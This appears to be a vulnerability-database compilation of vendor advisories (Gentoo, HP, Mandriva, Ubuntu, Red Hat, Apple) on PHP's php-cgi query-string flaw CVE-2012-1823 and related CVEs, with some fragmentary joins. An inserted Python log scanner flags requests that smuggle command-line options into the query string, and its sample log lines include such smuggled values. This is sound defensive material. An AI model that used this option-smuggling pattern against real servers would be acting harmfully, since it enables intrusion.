Multiple vulnerabilities have been discovered in PHP. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15"
All PHP users on ARM should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5"
References
==========
[ 1 ] CVE-2011-1398
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398
[ 2 ] CVE-2011-3379
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379
[ 3 ] CVE-2011-4566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566
[ 4 ] CVE-2011-4885
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885
[ 5 ] CVE-2012-0057
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057
[ 6 ] CVE-2012-0788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788
[ 7 ] CVE-2012-0789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789
[ 8 ] CVE-2012-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830
[ 9 ] CVE-2012-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831
[ 10 ] CVE-2012-1172
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172
[ 11 ] CVE-2012-1823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823
[ 12 ] CVE-2012-2143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143
[ 13 ] CVE-2012-2311
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311
[ 14 ] CVE-2012-2335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335
[ 15 ] CVE-2012-2336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336
[ 16 ] CVE-2012-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386
[ 17 ] CVE-2012-2688
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688
[ 18 ] CVE-2012-3365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365
[ 19 ] CVE-2012-3450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201209-03.xml
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Please refer to the following Mandriva
advisories for further information:
MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180,
MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03839862
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03839862
Version: 1
HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and
Windows, Multiple Remote and Local Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-07-18
Last Updated: 2013-07-18
Potential Security Impact: Local Denial of Service (DoS), remote Denial of
Service (DoS), execution of arbitrary code, gain extended privileges,
disclosure of information, unauthorized access, XSS
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Local Denial of Service (DoS),
remote Denial of Service (DoS), execution of arbitrary code, gain privileges,
disclosure of information, unauthorized access, or XSS.
References:
CVE-2011-3389 (SSRT100740) Remote disclosure of information
CVE-2012-0883 (SSRT101209) Remote gain extended privileges
CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS)
CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS)
CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS)
CVE-2013-2355 (SSRT100696) Remote unauthorized Access
CVE-2013-2356 (SSRT100835) Remote disclosure of information
CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2361 (SSRT101007) XSS
CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS)
CVE-2013-2363 (SSRT101150) Remote disclosure of information
CVE-2013-2364 (SSRT101151) XSS
CVE-2013-5217 (SSRT101137) Remote unauthorized access
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and
Windows.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2012-2110 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-2329 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-2335 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-2336 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-2355 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-2356 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8
CVE-2013-2357 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3
CVE-2013-2358 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3
CVE-2013-2359 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5
CVE-2013-2360 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5
CVE-2013-2361 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2013-2362 (AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0
CVE-2013-2363 (AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1
CVE-2013-2364 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0
CVE-2013-5217 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks agix for working with the TippingPoint
Zero Day Initiative to report vulnerability CVE-2013-2362 to
security-alert@hp.com
RESOLUTION
HP has made System Management Homepage (SMH) v7.2.1 or subsequent available
for Windows and Linux to resolve the vulnerabilities.
Information and updates for SMH can be found at the following location:
http://h18013.www1.hp.com/products/servers/management/agents/index.html
HISTORY
Version:1 (rev.1) - 18 July 2013 Initial release
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2012:068-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : php
Date : May 10, 2012
Affected: 2010.1, 2011.
_______________________________________________________________________
Problem Description:
A vulnerability has been found and corrected in php(-cgi):
PHP-CGI-based setups contain a vulnerability when parsing query string
parameters from php files.
The updated packages have been patched to correct this issue.
Update:
It was discovered that the previous fix for the CVE-2012-1823
vulnerability was incomplete (CVE-2012-2335, CVE-2012-2336). The
updated packages provide the latest version (5.3.13), which provides
a solution to this flaw.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336
https://bugs.php.net/bug.php?id=61910
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://www.openwall.com/lists/oss-security/2012/05/09/9
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2010.1:
Mandriva Linux 2010.1/X86_64:
Mandriva Linux 2011:
Mandriva Linux 2011/X86_64:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
============================================================================
Ubuntu Security Notice USN-1481-1
June 19, 2012
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description:
- php5: HTML-embedded scripting language interpreter
Details:
It was discovered that PHP incorrectly handled certain Tidy::diagnose
operations on invalid objects. A remote attacker could use this flaw to
cause PHP to crash, leading to a denial of service. (CVE-2012-0781)
It was discovered that PHP incorrectly handled certain multi-file upload
filenames. A remote attacker could use this flaw to cause a denial of
service, or to perform a directory traversal attack. (CVE-2012-1172)
Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain
Unicode characters in passwords passed to the crypt() function. A remote
attacker could possibly use this flaw to bypass authentication.
(CVE-2012-2143)
It was discovered that a Debian/Ubuntu specific patch caused PHP to
incorrectly handle empty salt strings. A remote attacker could possibly use
this flaw to bypass authentication. This issue only affected Ubuntu 10.04
LTS and Ubuntu 11.04. (CVE-2012-2317)
It was discovered that PHP, when used as a stand alone CGI processor
for the Apache Web Server, did not properly parse and filter query
strings. Configurations using mod_php5 and FastCGI were not vulnerable.
(CVE-2012-2335, CVE-2012-2336)
Alexander Gavrun discovered that the PHP Phar extension incorrectly handled
certain malformed TAR files.
(CVE-2012-2386)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
php5 5.3.10-1ubuntu3.2
Ubuntu 11.10:
php5 5.3.6-13ubuntu3.8
Ubuntu 11.04:
php5 5.3.5-1ubuntu7.10
Ubuntu 10.04 LTS:
php5 5.3.2-1ubuntu4.17
Ubuntu 8.04 LTS:
php5 5.2.4-2ubuntu5.25
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1481-1
CVE-2012-0781, CVE-2012-1172, CVE-2012-2143, CVE-2012-2317,
CVE-2012-2335, CVE-2012-2336, CVE-2012-2386
Package Information:
https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.2
https://launchpad.net/ubuntu/+source/php5/5.3.6-13ubuntu3.8
https://launchpad.net/ubuntu/+source/php5/5.3.5-1ubuntu7.10
https://launchpad.net/ubuntu/+source/php5/5.3.2-1ubuntu4.17
https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.25
| VAR-201205-0305 | CVE-2012-1823 |
PHP ‘php-cgi’ Parameter information leak vulnerability
Related entries in the VARIoT exploits database: VAR-E-201112-0006, VAR-E-201112-0003, VAR-E-201112-0007, VAR-E-201112-0002, VAR-E-201112-0008 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. PHP is prone to an information-disclosure vulnerability.
Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: PHP: Multiple vulnerabilities
Date: September 24, 2012
Bugs: #384301, #396311, #396533, #399247, #399567, #399573,
#401997, #410957, #414553, #421489, #427354, #429630
ID: 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in PHP, the worst of which lead to
remote execution of arbitrary code.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Affected packages
=================
-------------------------------------------------------------------
     Package       /  Vulnerable  /  Unaffected
-------------------------------------------------------------------
  1  dev-lang/php     < 5.3.15       >= 5.3.15
                      < 5.4.5        >= 5.4.5
-------------------------------------------------------------------
# Package 1 only applies to users of these architectures:
arm
Description
===========
Multiple vulnerabilities have been discovered in PHP. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15"
All PHP users on ARM should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5"
References
==========
[ 1 ] CVE-2011-1398
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398
[ 2 ] CVE-2011-3379
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379
[ 3 ] CVE-2011-4566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566
[ 4 ] CVE-2011-4885
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885
[ 5 ] CVE-2012-0057
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057
[ 6 ] CVE-2012-0788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788
[ 7 ] CVE-2012-0789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789
[ 8 ] CVE-2012-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830
[ 9 ] CVE-2012-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831
[ 10 ] CVE-2012-1172
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172
[ 11 ] CVE-2012-1823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823
[ 12 ] CVE-2012-2143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143
[ 13 ] CVE-2012-2311
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311
[ 14 ] CVE-2012-2335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335
[ 15 ] CVE-2012-2336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336
[ 16 ] CVE-2012-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386
[ 17 ] CVE-2012-2688
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688
[ 18 ] CVE-2012-3365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365
[ 19 ] CVE-2012-3450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201209-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Please refer to the following Mandriva
advisories for further information:
MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180,
MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1.
TITLE:
PHP PHP-CGI QUERY_STRING Parameter Vulnerability
SECUNIA ADVISORY ID:
SA49014
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49014/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49014
RELEASE DATE:
2012-05-04
DESCRIPTION:
De Eindbazen has reported a vulnerability in PHP, which can be
exploited by malicious people to disclose certain sensitive
information or compromise a vulnerable system.
The vulnerability is caused due to an error when parsing certain
QUERY_STRING parameters. This can be exploited to e.g.
The vulnerability is reported in versions 5.3.12 and prior and
versions 5.4.2 and prior.
SOLUTION:
Apply patch or workaround.
PROVIDED AND/OR DISCOVERED BY:
De Eindbazen
ORIGINAL ADVISORY:
PHP:
https://bugs.php.net/bug.php?id=61910
De Eindbazen:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
US-CERT VU#520827:
http://www.kb.cert.org/vuls/id/520827
. This fixes a vulnerability,
which can be exploited by malicious people to disclose certain
sensitive information or compromise a vulnerable system.
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03360041
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03360041
Version: 2
HPSBMU02786 SSRT100877 rev.2 - HP System Management Homepage (SMH) Running on
Linux, Windows, and VMware ESX, Remote Unauthorized Access, Disclosure of
Information, Data Modification, Denial of Service (DoS), Execution of
Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-05-08
Last Updated: 2013-05-08
Potential Security Impact: Remote unauthorized access, disclosure of
information, data modification, Denial of Service (DoS), execution of
arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux, Windows, and VMware ESX. The
vulnerabilities could be exploited remotely resulting in unauthorized access,
disclosure of information, data modification, Denial of Service (DoS), and
execution of arbitrary code.
References: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379,
CVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317,
CVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885,
CVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053,
CVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823, CVE-2012-2012
(AUTOCOMPLETE enabled), CVE-2012-2013 (DoS), CVE-2012-2014 (Improper input
validation), CVE-2012-2015 (Privilege Elevation), CVE-2012-2016 (Information
disclosure)
SSRT100336, SSRT100753, SSRT100669, SSRT100676, SSRT100695, SSRT100714,
SSRT100760, SSRT100786, SSRT100787, SSRT100815, SSRT100840, SSRT100843,
SSRT100869
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) before v7.1.1 running on Linux, Windows
and VMware ESX.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7
CVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8
CVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5
CVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4
CVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4
CVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2
CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6
CVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP System Management Homepage v7.1.1 to resolve the
vulnerabilities. HP System Management Homepage v7.1.1 or subsequent is
available for the following platforms:
Product/Platform
HP System Management Homepage for Windows x64
HP System Management Homepage for Windows x86
HP System Management Homepage for Linux (AMD64/EM64T)
HP System Management Homepage for Linux (x86)
HP Management Agents for VMware ESX 4.x Version 9.1.0(A) or subsequent
Available from: http://www.hp.com/swpublishing/MTX-ac3d1f80b8dd48b792bfc01a08
HISTORY
Version:1 (rev.1) - 26 June 2012 Initial release
Version:2 (rev.2) - 8 May 2013 Added SMH Management Agents for VMware ESX to
product updates and removed broken URL links
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: php security update
Advisory ID: RHSA-2012:0546-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0546.html
Issue date: 2012-05-07
CVE Names: CVE-2012-1823
=====================================================================
1. Summary:
Updated php packages that fix one security issue are now available for
Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having critical
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server.
A flaw was found in the way the php-cgi executable processed command line
arguments when running in CGI mode. A remote attacker could send a
specially-crafted request to a PHP script that would result in the query
string being parsed by php-cgi as command line options and arguments. (CVE-2012-1823)
Red Hat is aware that a public exploit for this issue is available that
allows remote code execution in affected PHP CGI configurations. This flaw
does not affect the default configuration in Red Hat Enterprise Linux 5 and
6 using the PHP module for Apache httpd to handle PHP scripts.
All php users should upgrade to these updated packages, which contain a
backported patch to resolve this issue. After installing the updated
packages, the httpd daemon must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
818607 - CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
6. Package List:
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/php-5.1.6-34.el5_8.src.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/php-5.1.6-34.el5_8.src.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1823.html
https://access.redhat.com/security/updates/classification/#critical
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
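A detection sketch for the flaw described in RHSA-2012:0546 above (the query string reaching php-cgi as command line options and arguments), added here as an example and not taken from Red Hat, PHP or any other vendor. It assumes access logs in common/combined format and relies on the CGI rule in RFC 3875 section 4.4 that a query string with no unencoded "=" is split on "+" into URL-decoded command-line words; the function names, option letters and log lines are constructed for illustration.

```python
"""Flag logged requests whose query string a CGI server would pass to the
handler as command-line words, where one of those words looks like an option."""
import re
from urllib.parse import unquote

# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def cgi_argv_words(query):
    """Return the command-line words derived from an 'indexed' query string.

    RFC 3875 section 4.4: a query string without an unencoded '=' is split
    on '+', and each word is URL-decoded before it is passed as an argument.
    An ordinary key=value query yields no words at all.
    """
    if not query or "=" in query:  # a raw '=' is an unencoded one (%3d is not)
        return []
    return [unquote(word) for word in query.split("+") if word]


def is_suspicious(target):
    """True if any derived word would be read as an option (leading '-')."""
    _path, sep, query = target.partition("?")
    if not sep:
        return False
    # Leading whitespace is ignored so a padded option is still flagged.
    return any(w.lstrip().startswith("-") for w in cgi_argv_words(query))


def scan(lines):
    """Return (line_number, target, words) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = match.group("target")
        if is_suspicious(target):
            query = target.partition("?")[2]
            hits.append((number, target, cgi_argv_words(query)))
    return hits


# Constructed sample log (documentation addresses, placeholder option "-x").
SAMPLE_LOG = [
    '192.0.2.10 - - [07/May/2012:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '192.0.2.11 - - [07/May/2012:10:00:02 +0000] "GET /index.php?-x HTTP/1.1" 200 812',
    '192.0.2.11 - - [07/May/2012:10:00:03 +0000] "GET /app.php?%2dx+value HTTP/1.1" 200 90',
    '192.0.2.12 - - [07/May/2012:10:00:04 +0000] "GET /search.php?q=-x HTTP/1.1" 200 300',
    '192.0.2.13 - - [07/May/2012:10:00:05 +0000] "GET /docs/readme.php?intro HTTP/1.1" 200 44',
    '192.0.2.14 - - [07/May/2012:10:00:06 +0000] "GET /form.php?%2Dx%3Dy HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for number, target, words in scan(SAMPLE_LOG):
        print(f"line {number}: {target} -> argv words {words}")
```

Requests such as `?q=-x` are not flagged because the unencoded "=" keeps the query from being treated as command-line words, while `%2Dx%3Dy` is flagged because both the hyphen and the "=" are percent-encoded.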
APPLE-SA-2012-09-19-2 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and
Security Update 2012-004
OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update
2012-004 are now available and address the following:
Apache
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Multiple vulnerabilities in Apache
Description: Apache is updated to version 2.2.22 to address several
vulnerabilities, the most serious of which may lead to a denial of
service. Further information is available via the Apache web site at
http://httpd.apache.org/. This issue does not affect OS X Mountain
Lion systems.
CVE-ID
CVE-2011-3368
CVE-2011-3607
